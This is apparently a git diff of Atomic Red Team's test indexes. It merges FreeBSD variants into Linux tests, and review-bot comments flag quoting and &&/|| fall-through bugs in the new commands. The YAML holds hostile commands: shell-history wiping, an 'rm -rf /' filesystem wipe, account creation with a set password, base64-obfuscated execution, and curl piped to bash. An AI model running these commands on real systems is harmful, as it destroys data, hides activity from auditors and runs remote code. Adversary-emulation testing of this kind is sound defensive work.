macos] + - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos] + - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos] + - Atomic Test #9: Disable Bash History Logging with SSH -T [linux] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #3: Base64 decoding with Python [linux, macos] - Atomic 
Test #4: Base64 decoding with Perl [linux, macos] @@ -220,7 +213,6 @@ - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos] - Atomic Test #3: Overwrite and delete a file with shred [linux] - Atomic Test #8: Delete Filesystem - Linux [linux] - - Atomic Test #9: Delete Filesystem - FreeBSD [linux] - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) - Atomic Test #1: Binary simply packed by UPX (linux) [linux] @@ -237,11 +229,10 @@ - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [linux] - - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [linux] + - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux] + - Atomic Test #11: Login as nobody (Linux) [linux] + - Atomic Test #12: Login as nobody (freebsd) [linux] - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) # persistence 
@@ -342,11 +333,10 @@ - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [linux] - - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [linux] + - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux] + - Atomic Test #11: Login as nobody (Linux) [linux] + - Atomic Test #12: Login as nobody (freebsd) [linux] # command-and-control - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -381,8 +371,7 @@ - T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) - - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux] - - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux] + - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu/FreeBSD [linux] - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1571 Non-Standard Port](../../T1571/T1571.md) - Atomic Test #2: Testing usage of uncommonly used port [linux, macos] 
@@ -441,7 +430,6 @@ - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux] - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1115 Clipboard Data](../../T1115/T1115.md) - Atomic Test #5: Add or copy content to clipboard with xClip [linux] @@ -564,11 +552,10 @@ - Atomic Test #2: At - Schedule a job [linux] - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [linux] - - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [linux] + - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux] + - Atomic Test #11: Login as nobody (Linux) [linux] + - Atomic Test #12: Login as nobody (freebsd) [linux] # credential-access - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -670,8 +657,7 @@ - Atomic Test #3: View accounts with UID 0 [linux, macos] - Atomic Test #4: List opened files by user [linux, macos] - Atomic Test #5: Show if a user account has ever logged in remotely [linux] - - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux] - - Atomic Test #7: Enumerate users and groups [linux, macos] + - Atomic Test #6: Enumerate users and groups [linux, macos] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] @@ -782,14 +768,10 @@ - Atomic Test #7: What shells are available [linux] - Atomic Test #8: Command line scripts [linux] - Atomic Test #9: Obfuscated command line scripts [linux] - - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux] - - Atomic Test #11: Change login shell [linux] - - Atomic Test #12: Change login shell (freebsd) [linux] - - Atomic Test #13: Environment variable scripts [linux] - - Atomic Test #14: Environment variable scripts (freebsd) [linux] - - Atomic Test #15: Detecting pipe-to-shell [linux] - - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux] - - Atomic Test #17: Current kernel information enumeration [linux] + - Atomic Test #10: Change login shell [linux] + - Atomic Test #11: Environment variable scripts [linux] + - Atomic Test #12: Detecting pipe-to-shell [linux] + - Atomic Test #13: Current kernel information enumeration [linux] - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -880,11 +862,10 @@ - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] - - Atomic Test #9: Create local account (FreeBSD) [linux] - - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] - - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - - Atomic Test #12: Login as nobody (Linux) [linux] - - Atomic Test #13: Login as nobody (freebsd) [linux] + - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux] + - Atomic Test #11: Login as nobody (Linux) [linux] + - Atomic Test #12: Login as nobody (freebsd) [linux] # exfiltration - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 0ba52187f..3e69c46b0 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md 
@@ -56,11 +56,11 @@ - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos] - - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos] - - Atomic Test #11: Clear history of a bunch of shells [linux, macos] - - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] + - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos] + - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos] + - Atomic Test #6: Clear history of a bunch of shells [linux, macos] + - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos] + - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #3: Base64 decoding with Python [linux, macos] - Atomic Test #4: Base64 decoding with Perl [linux, macos] @@ -574,8 +574,8 @@ - Atomic Test #2: View sudoers access [linux, macos] - Atomic Test #3: View accounts with UID 0 [linux, macos] - Atomic Test #4: List opened files by user [linux, macos] - - Atomic Test #7: Enumerate users and groups [linux, macos] - - Atomic Test #8: Enumerate users and groups [macos] + - Atomic Test #6: Enumerate users and groups [linux, macos] + - Atomic Test #7: Enumerate users and groups [macos] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos] - T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 1adf31e42..182e011e6 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -116,9 +116,9 @@ - Atomic Test #1: Install and Register Password Filter DLL [windows] - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) - - Atomic Test #17: Prevent Powershell History Logging [windows] - - Atomic Test #18: Clear Powershell History by Deleting History File [windows] - - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows] + - Atomic Test #10: Prevent Powershell History Logging [windows] + - Atomic Test #11: Clear Powershell History by Deleting History File [windows] + - Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows] - [T1202 Indirect Command Execution](../../T1202/T1202.md) - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] @@ -492,8 +492,8 @@ - Atomic Test #5: Delete an entire folder - Windows cmd [windows] - Atomic Test #6: Delete a single file - Windows PowerShell [windows] - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows] - - Atomic Test #10: Delete Prefetch File [windows] - - Atomic Test #11: Delete TeamViewer Log Files [windows] + - Atomic Test #9: Delete Prefetch File [windows] + - Atomic Test #10: Delete TeamViewer Log Files [windows] - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1221 Template Injection](../../T1221/T1221.md) - Atomic Test #1: WINWORD Remote Template Injection [windows] 
@@ -1310,7 +1310,7 @@ - T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #1: Stage data from Discovery.bat [windows] - - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows] + - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows] - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] - [T1119 Automated Collection](../../T1119/T1119.md) @@ -1622,9 +1622,9 @@ - Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows] - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md) - - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows] - - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows] - - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows] + - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows] + - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows] + - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #3: Detect Virtualization Environment (Windows) [windows] - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2c6dbea53..9023970bf 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -7506,23 +7506,16 @@ defense-evasion: description: 'Clears bash history via rm ' + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" supported_platforms: - linux - macos executor: - command: 'rm ~/.bash_history - - ' - name: sh - - name: Clear sh history (rm) - auto_generated_guid: 448893f8-1d5d-4ae2-9017-7fcd73a7e100 - description: 'Clears sh history via rm - - ' - supported_platforms: - - linux - executor: - command: 'rm ~/.sh_history + command: 'rm #{history_path} ' name: sh @@ -7531,22 +7524,15 @@ defense-evasion: description: 'Clears bash history via echo ' + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" supported_platforms: - linux executor: - command: 'echo "" > ~/.bash_history - - ' - name: sh - - name: Clear sh history (echo) - auto_generated_guid: a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 - description: 'Clears sh history via echo - - ' - supported_platforms: - - linux - executor: - command: 'echo "" > ~/.sh_history + command: 'echo "" > #{history_path} ' name: sh @@ -7558,20 +7544,13 @@ defense-evasion: supported_platforms: - linux - macos + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'cat /dev/null > ~/.bash_history - - ' - name: sh - - name: Clear sh history (cat dev/null) - auto_generated_guid: ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc - description: 'Clears sh history via cat /dev/null - - ' - supported_platforms: - - linux - executor: - command: 'cat /dev/null > ~/.sh_history + command: 'cat /dev/null > #{history_path} ' name: sh 
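Review bot: `rm #{history_path}` (and the echo and cat variants in the two hunks that follow, plus the ln and truncate hunks on the next line) substitute the new `history_path` argument unquoted, which is what lets the default `~/.bash_history` tilde-expand but also means a value containing spaces or glob characters is word-split before the command sees it. Either document that the argument is unquoted and shell-expanded, or change the default to `$HOME/.bash_history` and quote the substitution as `rm "#{history_path}"`. The argument is described only as `Bash history path`, while the removed sh variants are presumably now meant to be covered by passing `~/.sh_history`; a description such as `Path of the shell history file to clear (e.g. ~/.bash_history or ~/.sh_history)` would make that explicit. The `input_arguments` block sits before `supported_platforms` in the first two hunks and after it in the others; one order would keep the index consistent. If index.yaml is generated from the per-technique T1070.003 YAML, these changes belong there rather than here.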
@@ -7583,20 +7562,13 @@ defense-evasion: supported_platforms: - linux - macos + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'ln -sf /dev/null ~/.bash_history - - ' - name: sh - - name: Clear sh history (ln dev/null) - auto_generated_guid: 3126aa7a-8768-456f-ae05-6ab2d4accfdd - description: 'Clears sh history via a symlink to /dev/null - - ' - supported_platforms: - - linux - executor: - command: 'ln -sf /dev/null ~/.sh_history + command: 'ln -sf /dev/null #{history_path} ' name: sh @@ -7607,20 +7579,13 @@ defense-evasion: ' supported_platforms: - linux + input_arguments: + history_path: + description: Bash history path + type: path + default: "~/.bash_history" executor: - command: 'truncate -s0 ~/.bash_history - - ' - name: sh - - name: Clear sh history (truncate) - auto_generated_guid: e14d9bb0-c853-4503-aa89-739d5c0a5818 - description: 'Clears sh history via truncate - - ' - supported_platforms: - - linux - executor: - command: 'truncate -s0 ~/.sh_history + command: 'truncate -s0 #{history_path} ' name: sh @@ -7639,22 +7604,6 @@ defense-evasion: export HISTFILESIZE=0 history -c name: sh - - name: Clear history of a bunch of shells (freebsd) - auto_generated_guid: 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 - description: 'Clears the history of a bunch of different shell types by setting - the history size to zero - - ' - supported_platforms: - - linux - executor: - command: | - unset HISTFILE - unset histfile - export HISTFILESIZE=0 - export HISTSIZE=0 - history -c - name: sh - name: Clear and Disable Bash History Logging auto_generated_guid: 784e4011-bd1a-4ecd-a63a-8feb278512e6 description: 'Clears the history and disable bash history logging of the current 
@@ -7705,41 +7654,15 @@ defense-evasion: prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | - /usr/sbin/useradd testuser1 - echo -e 'pwd101!\npwd101!' | passwd testuser1 - (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass) + [ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1 + [ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1 + (which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass) executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname ' - cleanup_command: 'userdel -f testuser1 - - ' - name: sh - - name: Disable sh History Logging with SSH -T (freebsd) - auto_generated_guid: ec3f2306-dd19-4c4b-bed7-92d20e9b1dee - description: 'Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T - keeps the ssh client from catching a proper TTY, which is what usually gets - logged on lastlog - - ' - supported_platforms: - - linux - dependencies: - - description: 'Install sshpass and create user account used for excuting - - ' - prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass - >/dev/null)\n" - get_prereq_command: | - pw useradd testuser1 -g wheel -s /bin/sh - echo 'pwd101!' | pw mod user testuser1 -h 0 - (which pkg && pkg install -y sshpass) - executor: - command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - - ' - cleanup_command: 'rmuser -y testuser1 + cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y testuser1 || userdel + -f testuser1 ' name: sh 
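Review bot: The new `get_prereq_command` lines and the `cleanup_command` select the platform with `test && freebsd_cmd || linux_cmd`, so a non-zero exit from the FreeBSD branch (for example `pw useradd` failing because testuser1 already exists and only sshpass was missing, which the prereq_command above allows) falls through and runs the Linux command on the same host; the second line has the same shape around a pipeline. An explicit `if [ "$(uname)" = 'FreeBSD' ]; then ...; else ...; fi` per line makes each platform run only its own branch and keeps the exit status meaningful for the prerequisite check. The same `&&`/`||` chaining appears in the Delete Filesystem, Create local account (both copies), Change login shell and Detecting pipe-to-shell hunks below. This test's name, description and prereq_command lie before the hunk.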
@@ -28349,23 +28272,10 @@ defense-evasion: supported_platforms: - linux executor: - command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null + command: '[ "$(uname)" = ''Linux'' ] && rm -rf / --no-preserve-root > /dev/null + 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null ' - name: bash - - name: Delete Filesystem - FreeBSD - auto_generated_guid: b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 - description: 'This test deletes the entire root filesystem of a FreeBSD system. - This technique was used by Amnesia IoT malware to avoid analysis. This test - is dangerous and destructive, do NOT use on production equipment. - - ' - supported_platforms: - - linux - executor: - command: | - chflags -R 0 / - rm -rf / > /dev/null 2> /dev/null name: sh - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb 
@@ -32072,26 +31982,11 @@ defense-evasion: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) 
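Review bot: The FreeBSD branch of the new command sets the password with `pw mod user testuser1 -h 0` although the account just created is `art`, so `art` never receives the generated password (and an unrelated testuser1 account would be modified if one exists); it should read `pw mod user art -h 0`. The executor remains `name: bash` on the context line at the top of the hunk while the command now has a FreeBSD path; if bash is not guaranteed on FreeBSD test hosts the executor should be `sh`, as the removed FreeBSD test used. The duplicate of this test in the privilege-escalation section (next hunk) carries the same two issues. The test's name and description are outside this hunk.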
@@ -51032,26 +50927,11 @@ privilege-escalation: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || rmuser + -y art ' - name: Reactivate a locked/expired account (Linux) 
@@ -56553,29 +56433,14 @@ execution: ' supported_platforms: - linux - executor: - name: sh - elevation_required: false - command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n - \"$ART\" |base64 -d |/bin/bash\nunset ART \n" - - name: Obfuscated command line scripts (freebsd) - auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062 - description: 'An adversary may pre-compute the base64 representations of the - terminal commands that they wish to execute in an attempt to avoid or frustrate - detection. The following commands base64 encodes the text string id, then - base64 decodes the string, then pipes it as a command to bash, which results - in the id command being executed. - - ' - supported_platforms: - - linux executor: name: sh elevation_required: false command: | - ART=$(echo -n "id" |b64encode -r -) + [ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d" + ART=$(echo -n "id" | $encodecmd) echo "\$ART=$ART" - echo -n "$ART" |b64decode -r |/bin/sh + echo -n "$ART" | $decodecmd |/bin/bash unset ART - name: Change login shell auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 
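Review bot: The selector line `[ "$(uname)" = 'FreeBSD' ] && encodecmd=... && decodecmd=... || encodecmd=... && decodecmd="base64 -d"` is evaluated left to right, so on FreeBSD the three leading assignments succeed, the `||` alternative is skipped, and the trailing `&& decodecmd="base64 -d"` still runs and overwrites the FreeBSD decoder. Writing it as `if [ "$(uname)" = 'FreeBSD' ]; then encodecmd="b64encode -r -"; decodecmd="b64decode -r"; else encodecmd="base64 -w 0"; decodecmd="base64 -d"; fi` gives each platform its own pair. The decoded string is now also piped to `/bin/bash` on both platforms where the removed FreeBSD test used `/bin/sh`; if bash is not part of the base install there, the FreeBSD path fails for that reason too. The test's description, which states the expected behaviour, is outside the hunk and should still match the merged command.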
@@ -56601,42 +56466,12 @@ execution: name: bash elevation_required: true command: | - useradd -s /bin/bash art + [ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art cat /etc/passwd |grep ^art chsh -s /bin/sh art cat /etc/passwd |grep ^art - cleanup_command: 'userdel art - - ' - - name: Change login shell (freebsd) - auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c - description: "An adversary may want to use a different login shell. The chsh - command changes the user login shell. The following test, creates an art user - with a /bin/sh shell, changes the users shell to sh, then deletes the art - user. \n" - supported_platforms: - - linux - dependencies: - - description: 'chsh - change login shell, must be installed - - ' - prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit - 1"; exit 1; fi - - ' - get_prereq_command: 'echo "Automated installer not implemented yet, please - install chsh manually" - - ' - executor: - name: sh - elevation_required: true - command: | - pw useradd art -g wheel -s /bin/csh - cat /etc/passwd |grep ^art - chsh -s /bin/sh art - cat /etc/passwd |grep ^art - cleanup_command: 'rmuser -y art + cleanup_command: '[ "$(uname)" = ''FreeBSD'' ] && rmuser -y art || userdel + art ' - name: Environment variable scripts 
@@ -56649,25 +56484,6 @@ execution: ' supported_platforms: - linux - executor: - name: bash - elevation_required: false - command: | - export ART='echo "Atomic Red Team was here... T1059.004"' - echo $ART |/bin/bash - cleanup_command: 'unset ART - - ' - - name: Environment variable scripts (freebsd) - auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee - description: 'An adversary may place scripts in an environment variable because - they can''t or don''t wish to create script files on the host. The following - test, in a bash shell, exports the ART variable containing an echo command, - then pipes the variable to /bin/sh - - ' - supported_platforms: - - linux executor: name: sh elevation_required: false 
@@ -56698,59 +56514,24 @@ execution: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh dependency_executor_name: bash dependencies: - - description: 'Check if running on a Debian based machine. + - description: 'Check if curl is installed on the machine. ' - prereq_command: | - if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi - if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi - get_prereq_command: 'apt update && apt install -y curl + prereq_command: 'if [ -x "$(command -v curl)" ]; then echo "curl is installed"; + else echo "curl is NOT installed"; exit 1; fi ' - executor: - name: bash - elevation_required: false - command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} - |bash\nls -la /tmp/art.txt \n" - cleanup_command: 'rm /tmp/art.txt - - ' - - name: Detecting pipe-to-shell (freebsd) - auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632 - description: 'An adversary may develop a useful utility or subvert the CI/CD - pipe line of a legitimate utility developer, who requires or suggests installing - their utility by piping a curl download directly into bash. Of-course this - is a very bad idea. The adversary may also take advantage of this BLIND install - method and selectively running extra commands in the install script for those - who DO pipe to bash and not for those who DO NOT. This test uses curl to download - the pipe-to-shell.sh script, the first time without piping it to bash and - the second piping it into bash which executes the echo command. 
- - ' - supported_platforms: - - linux - input_arguments: - remote_url: - description: url of remote payload - type: url - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh - dependency_executor_name: sh - dependencies: - - description: 'Check if running on a Debian based machine. - - ' - prereq_command: | - if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi - if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi - get_prereq_command: 'pkg update && pkg install -y curl + get_prereq_command: 'which apt && apt update && apt install -y curl || which + pkg && pkg update && pkg install -y curl ' executor: name: sh elevation_required: false - command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} - |bash\nls -la /tmp/art.txt \n" - cleanup_command: "rm /tmp/art.txt \n" + command: "cd /tmp\ncurl -s #{remote_url} |bash\nls -la /tmp/art.txt \n" + cleanup_command: 'rm /tmp/art.txt + + ' - name: Current kernel information enumeration auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14 description: 'An adversary may want to enumerate the kernel information to tailor 
@@ -78714,26 +78495,11 @@ persistence: name: bash elevation_required: true command: | - useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art - su art - whoami - exit - cleanup_command: "userdel -r art \n" - - name: Create local account (FreeBSD) - auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 - description: 'An adversary may wish to create an account with admin privileges - to work with. In this test we create a "art" user with the password art, switch - to art, execute whoami, exit and delete the art user. - - ' - supported_platforms: - - linux - executor: - name: sh - elevation_required: true - command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) - | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" - cleanup_command: 'rmuser -y art + password=$(openssl passwd -1 art) + ([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0)) + su art -c "whoami; exit" + cleanup_command: '[ "$(uname)" = ''Linux'' ] && userdel art -rf || 